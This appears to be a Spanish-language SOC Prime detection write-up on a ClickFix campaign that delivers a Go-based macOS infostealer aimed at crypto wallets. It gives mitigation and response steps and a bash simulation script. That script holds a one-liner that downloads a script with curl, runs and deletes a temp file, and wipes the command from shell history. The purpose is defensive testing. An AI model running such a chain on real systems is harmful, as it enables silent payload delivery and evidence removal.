SOC Prime Bias: Alto

10 Aug 2026 17:15 UTC

macOS Infostealer apunta a carteras de criptomonedas

Author Photo
SOC Prime Team linkedin icon Seguir
macOS Infostealer apunta a carteras de criptomonedas
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Un ladrón basado en Go para macOS está apuntando a usuarios de criptomonedas a través de una campaña de ingeniería social ClickFix. El malware roba credenciales sensibles del Apple Keychain y de las tiendas del navegador, además de tener la capacidad de agotar gradualmente los saldos de criptomonedas de las carteras de las víctimas. La cadena de infección comienza con un perfilador de scripts de shell que entrega cargas útiles Mach-O específicas de la arquitectura.

Investigación

Los analistas de Huntress descubrieron la amenaza durante una búsqueda retrospectiva e identificaron componentes de un ladrón específico para macOS que había permanecido activo durante aproximadamente tres meses. La investigación vinculó la infraestructura de soporte al Grupo Aeza, un proveedor ruso de hosting a prueba de balas sancionado. Los investigadores reconstruyeron la cadena de ataque desde el aviso inicial de ingeniería social ClickFix hasta la ejecución final de la carga útil y la comunicación C2.

Mitigación

Los usuarios deben evitar interactuar con avisos de CAPTCHA sospechosos o seguir instrucciones inusuales que requieran comandos a ser ingresados en Terminal. Las extensiones de navegador diseñadas para restringir scripts maliciosos, como NoScript, y herramientas de bloqueo basadas en DNS como Pi-hole pueden ayudar a reducir la exposición. Un entrenamiento integral de concienciación para usuarios enfocado en la ingeniería social ClickFix sigue siendo una de las defensas más efectivas.

Respuesta

Si se detecta una infección, el sistema macOS afectado debe ser aislado inmediatamente para detener la exfiltración de datos adicional o el agotamiento de la billetera de criptomonedas. Los administradores deben localizar y eliminar todos los binarios maliciosos Mach-O y los mecanismos de persistencia asociados. Dado que el malware apunta a credenciales, se deben restablecer las contraseñas para todas las cuentas accedidas desde el dispositivo comprometido.

Flujo de Ataque

Ejecución de Simulación

Prerrequisito: El Verificación de Pre-vuelo de Telemetría y Línea Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa del Ataque y Comandos: El adversario inicia una estafa ClickFix. La víctima es engañada para ejecutar un comando en su terminal. El comando usa curl -kFsSL para descargar un script malicioso de forma silenciosa. Para evitar dejar huellas, el script se ejecuta a través de un one-liner de bash que elimina inmediatamente su propio archivo temporal (.UlaccK). Finalmente, el atacante ejecuta un comando complejo history para eliminar quirúrgicamente el comando del historial de shell del usuario, haciendo que el ataque sea invisible a una inspección forense casual.

  • Script de Prueba de Regresión:

    #!/bin/bash
    # Simulación del Ataque de Malware ClickFix en macOS
    # Este script imita los patrones exactos de cadena requeridos por la regla de detección.
    
    echo "[+] Iniciando Simulación..."
    
    # 1. Simular la descarga de curl (Selección 3)
    # 2. Simular la ejecución de bash y la eliminación inmediata (Selección 1)
    # 3. Simular la manipulación del historial (Selección 2)
    
    # Combinamos estos en una sola línea para imitar el patrón de comportamiento
    # Nota: Usamos una URL ficticia para evitar la ejecución real de malware
    curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}')
    
    echo "[+] Comando de Simulación Ejecutado."
    echo "[!] Verifique su SIEM para la alerta 'Ataque de Malware que Agota la Billetera en macOS'."
  • Comandos de Limpieza:

    # Eliminar cualquier artefacto dejado por la simulación
    rm -f .UlaccK
    # Nota: La manipulación del historial en el script tiene la intención de simular evasión;
    # puede ser necesario restaurar el historial manualmente para el usuario de prueba.